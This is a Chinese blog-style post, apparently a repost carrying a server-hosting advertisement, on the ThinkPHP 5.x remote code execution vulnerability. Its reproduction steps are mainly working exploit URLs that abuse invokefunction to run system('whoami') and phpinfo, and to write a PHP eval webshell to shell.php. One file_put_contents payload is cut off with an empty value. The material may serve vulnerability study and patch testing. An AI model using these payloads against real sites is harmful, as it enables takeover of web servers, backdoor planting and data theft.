這篇文章將為大家詳細(xì)講解有關(guān)thinkphp遠(yuǎn)程執(zhí)行命令漏洞,小編覺得挺實用的,因此分享給大家做個參考,希望大家閱讀完這篇文章后可以有所收獲。
成都服務(wù)器托管,創(chuàng)新互聯(lián)提供包括服務(wù)器租用、成都多線服務(wù)器托管、帶寬租用、云主機(jī)、機(jī)柜租用、主機(jī)租用托管、CDN網(wǎng)站加速、域名與空間等業(yè)務(wù)的一體化完整服務(wù)。電話咨詢:18980820575漏洞概況
ThinkPHP是一款國內(nèi)流行的開源PHP框架,近日被爆出存在可能的遠(yuǎn)程代碼執(zhí)行漏洞,攻擊者可向緩存文件內(nèi)寫入PHP代碼,導(dǎo)致遠(yuǎn)程代碼執(zhí)行。
雖然該漏洞利用需要有幾個前提條件,但鑒于國內(nèi)使用ThinkPHP框架的站點數(shù)量之多,該漏洞還是存在一定的影響范圍。由于框架對控制器名沒有進(jìn)行足夠的檢測會導(dǎo)致在沒有開啟強(qiáng)制路由的情況下可能的getshell漏洞。
漏洞危害
攻擊者可通過該漏洞獲取網(wǎng)站的控制權(quán)限,可修改頁面,導(dǎo)致數(shù)據(jù)泄漏等問題。
影響版本
5.x < 5.1.31, <= 5.0.23
復(fù)現(xiàn)環(huán)境
thinkphp5.1 phpstudy集成環(huán)境(php5.6n+apache+mysql)
復(fù)現(xiàn)過程
1、如圖所示首先搭建好環(huán)境
2、利用system函數(shù)遠(yuǎn)程命令執(zhí)行:
http://localhost/thinkphp5.1/html/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=whoami
3、通過phpinfo函數(shù)寫出phpinfo()的信息:
http://localhost/thinkphp5.1/html/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars%5B0%5D=phpinfo&vars%5B1%5D%5B%5D=1
4、寫入shell:
http://localhost/thinkphp5.1/html/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^%3C?php%20@eval($_GET[%22code%22])?^%3E%3Eshell.php
或
http://localhost/thinkphp5.1/html/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=
關(guān)于“thinkphp遠(yuǎn)程執(zhí)行命令漏洞”這篇文章就分享到這里了,希望以上內(nèi)容可以對大家有一定的幫助,使各位可以學(xué)到更多知識,如果覺得文章不錯,請把它分享出去讓更多的人看到。